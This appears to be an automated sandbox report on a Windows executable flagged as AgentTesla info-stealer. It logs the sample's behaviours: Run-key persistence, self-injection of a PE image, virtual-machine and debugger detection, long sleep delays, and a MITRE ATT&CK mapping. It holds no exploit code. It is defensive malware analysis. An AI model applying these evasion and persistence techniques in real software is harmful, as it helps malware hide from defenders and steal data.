Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 2_2_0078AFBA AdjustTokenPrivileges,		2_2_0078AFBA
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 2_2_0078AF83 AdjustTokenPrivileges,		2_2_0078AF83

Source: C:\Users\user\Desktop\3NeufRwoxF.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

File created: C:\Users\user\AppData\Roaming\word

Jump to behavior

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

File created: C:\Users\user\AppData\Local\Temp\nsvCA55.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/5@1/1

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Code function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,

0_2_00402012

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Code function: 0_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404275

Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Code function: 2_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,

2_2_00401489

Source: 2.2.3NeufRwoxF.exe.49d0000.4.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 2.2.3NeufRwoxF.exe.49d0000.4.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Users\user\Desktop\3NeufRwoxF.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: 3NeufRwoxF.exe, 00000000.00000003.649117191.0000000003200000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000000.00000003.649806691.0000000003070000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: 3NeufRwoxF.exe, 00000000.00000003.649117191.0000000003200000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000000.00000003.649806691.0000000003070000.00000004.00000001.sdmp

Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 0_2_72B21000 push eax; ret	0_2_72B2102E
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 2_2_00401F16 push ecx; ret	2_2_00401F29
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 2_1_00401F16 push ecx; ret	2_1_00401F29

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Code function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405DA3

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

File created: C:\Users\user\AppData\Local\Temp\nsvCA57.tmp\qvddvmam.dll

Jump to dropped file

Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run word			Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run word			Jump to behavior

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\3NeufRwoxF.exe TID: 6800	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe TID: 6800	Thread sleep time: -4080000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe TID: 6800	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\3NeufRwoxF.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 0_2_00405D7C FindFirstFileA,FindClose,	0_2_00405D7C
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_004053AA
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 0_2_00402630 FindFirstFileA,	0_2_00402630
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 2_2_00404A29 FindFirstFileExW,	2_2_00404A29
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 2_1_00404A29 FindFirstFileExW,	2_1_00404A29

Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Users\user\Desktop\3NeufRwoxF.exe	API call chain: ExitProcess graph end node			graph_0-3649
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	API call chain: ExitProcess graph end node			graph_0-3645

Source: 3NeufRwoxF.exe, 00000002.00000002.735683067.0000000005486000.00000004.00000001.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Code function: 2_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_0040446F

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Code function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405DA3

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Code function: 2_2_004067FE GetProcessHeap,

2_2_004067FE

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 0_2_0019EA84 mov eax, dword ptr fs:[00000030h]	0_2_0019EA84
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 0_2_0019EA07 mov eax, dword ptr fs:[00000030h]	0_2_0019EA07
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 0_2_0019E956 mov eax, dword ptr fs:[00000030h]	0_2_0019E956
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 0_2_0019E742 mov eax, dword ptr fs:[00000030h]	0_2_0019E742
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 0_2_0019EA46 mov eax, dword ptr fs:[00000030h]	0_2_0019EA46
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 2_2_004035F1 mov eax, dword ptr fs:[00000030h]	2_2_004035F1
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 2_1_004035F1 mov eax, dword ptr fs:[00000030h]	2_1_004035F1

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Code function: 2_2_024337AF LdrInitializeThunk,

2_2_024337AF

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 2_2_00401E1D SetUnhandledExceptionFilter,	2_2_00401E1D
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 2_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0040446F
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 2_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00401C88
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 2_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00401F30
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 2_1_00401E1D SetUnhandledExceptionFilter,	2_1_00401E1D
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 2_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_1_0040446F
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 2_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_1_00401C88
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 2_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_1_00401F30

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Memory written: C:\Users\user\Desktop\3NeufRwoxF.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Process created: C:\Users\user\Desktop\3NeufRwoxF.exe "C:\Users\user\Desktop\3NeufRwoxF.exe"

Jump to behavior

Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Code function: 2_2_0040208D cpuid

2_2_0040208D

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Code function: 2_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

2_2_00401B74

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Code function: 0_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405AA7

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Code function: 2_2_0078BB16 GetUserNameW,

2_2_0078BB16

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 2.0.3NeufRwoxF.exe.415058.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3NeufRwoxF.exe.23c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3NeufRwoxF.exe.23c0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3NeufRwoxF.exe.3031458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.3NeufRwoxF.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3NeufRwoxF.exe.49d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.3NeufRwoxF.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.3NeufRwoxF.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.3NeufRwoxF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.3NeufRwoxF.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3NeufRwoxF.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3NeufRwoxF.exe.415058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3NeufRwoxF.exe.3020000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.3NeufRwoxF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3NeufRwoxF.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.3NeufRwoxF.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.3NeufRwoxF.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3NeufRwoxF.exe.38d3258.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.3NeufRwoxF.exe.415058.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3NeufRwoxF.exe.415058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3NeufRwoxF.exe.3020000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3NeufRwoxF.exe.3031458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.3NeufRwoxF.exe.415058.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.3NeufRwoxF.exe.415058.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.3NeufRwoxF.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.3NeufRwoxF.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3NeufRwoxF.exe.38d3258.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.3NeufRwoxF.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000001.655268530.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.654698567.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.730336959.0000000000824000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.653816558.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.734722737.00000000038D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.656663064.0000000003020000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.734344539.00000000023C0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.734912309.00000000049D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.733760702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.734429027.00000000028D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3NeufRwoxF.exe PID: 4484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3NeufRwoxF.exe PID: 4828, type: MEMORYSTR

Source: Yara match	File source: 00000002.00000002.734429027.00000000028D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3NeufRwoxF.exe PID: 4828, type: MEMORYSTR

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 2.0.3NeufRwoxF.exe.415058.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3NeufRwoxF.exe.23c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3NeufRwoxF.exe.23c0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3NeufRwoxF.exe.3031458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.3NeufRwoxF.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3NeufRwoxF.exe.49d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.3NeufRwoxF.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.3NeufRwoxF.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.3NeufRwoxF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.3NeufRwoxF.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3NeufRwoxF.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3NeufRwoxF.exe.415058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3NeufRwoxF.exe.3020000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.3NeufRwoxF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3NeufRwoxF.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.3NeufRwoxF.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.3NeufRwoxF.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3NeufRwoxF.exe.38d3258.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.3NeufRwoxF.exe.415058.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3NeufRwoxF.exe.415058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3NeufRwoxF.exe.3020000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3NeufRwoxF.exe.3031458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.3NeufRwoxF.exe.415058.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.3NeufRwoxF.exe.415058.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.3NeufRwoxF.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.3NeufRwoxF.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3NeufRwoxF.exe.38d3258.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.3NeufRwoxF.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000001.655268530.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.654698567.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.730336959.0000000000824000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.653816558.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.734722737.00000000038D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.656663064.0000000003020000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.734344539.00000000023C0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.734912309.00000000049D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.733760702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.734429027.00000000028D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3NeufRwoxF.exe PID: 4484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3NeufRwoxF.exe PID: 4828, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Registry Run Keys / Startup Folder1	Access Token Manipulation1	Disable or Modify Tools1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Process Injection111	Deobfuscate/Decode Files or Information11	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Registry Run Keys / Startup Folder1	Obfuscated Files or Information2	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing1	NTDS	System Information Discovery126	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol11	SIM Card Swap		Carrier Billing Fraud
